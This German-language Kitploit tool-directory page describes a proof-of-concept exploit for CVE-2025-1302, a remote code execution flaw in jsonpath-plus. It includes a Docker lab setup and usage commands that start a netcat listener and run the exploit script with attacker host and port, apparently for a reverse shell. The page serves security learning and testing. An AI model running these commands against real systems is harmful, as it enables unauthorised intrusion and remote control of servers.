Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-1302 — JSONPath-plus: Remotecodeausführung | Kitploit
Tools/GitHubGitHub/eqstlab/cve-2025-1302
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungLabs & Praxis
GitHubeqstlab/cve-2025-1302

CVE-2025-1302

JSONPath-plus: Remotecodeausführung

Repository anzeigen
201vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-1302

★ CVE-2025-1302 JSONPath-plus RCE PoC ★

https://github.com/user-attachments/assets/5d791540-ef6c-4cd0-bd25-7a1dbbd194fb

Laboreinrichtung

root@kitploit:~
docker build -t jsonpath:10.2.0 .
docker run --rm --name jsonpath -p 3000:3000 jsonpath:10.2.0

localhost:3000 image

Beschreibung

Versionen des Pakets jsonpath-plus vor 10.3.0 sind aufgrund einer unzureichenden Eingabebereinigung anfällig für Remote Code Execution (RCE). Ein Angreifer kann beliebigen Code auf dem System ausführen, indem er die unsichere Standardverwendung des eval='safe'-Modus ausnutzt. Hinweis: Dies wird durch eine unvollständige Behebung von CVE-2024-21534 verursacht.

Verwendung

Repository klonen

root@kitploit:~
git clone https://github.com/EQSTLab/CVE-2025-1302.git
cd CVE-2025-1302

Pakete installieren

root@kitploit:~
pip install -r requirements.txt

Befehl

root@kitploit:~
nc -l -p <LPORT>
python3 CVE-2025-1302.py -u <URL_TO_EXPLOIT> -i <LHOST> -p <LPORT>

Ausgabe

image

Ergebnis

image

Haftungsausschluss

Dieses Repository ist nicht als RCE-Exploit für CVE-2025-1302 gedacht. Der Zweck dieses Projekts ist es, Menschen dabei zu helfen, mehr über diese Sicherheitslücke zu erfahren und möglicherweise ihre eigenen Anwendungen zu testen.

EQST Insight

Wir veröffentlichen einmal im Monat CVE- und Malware-Analysen. Wenn Sie interessiert sind, folgen Sie bitte den untenstehenden Links, um unsere Veröffentlichungen anzusehen. https://www.skshieldus.com/eng/business/insight.do

Tool herunterladen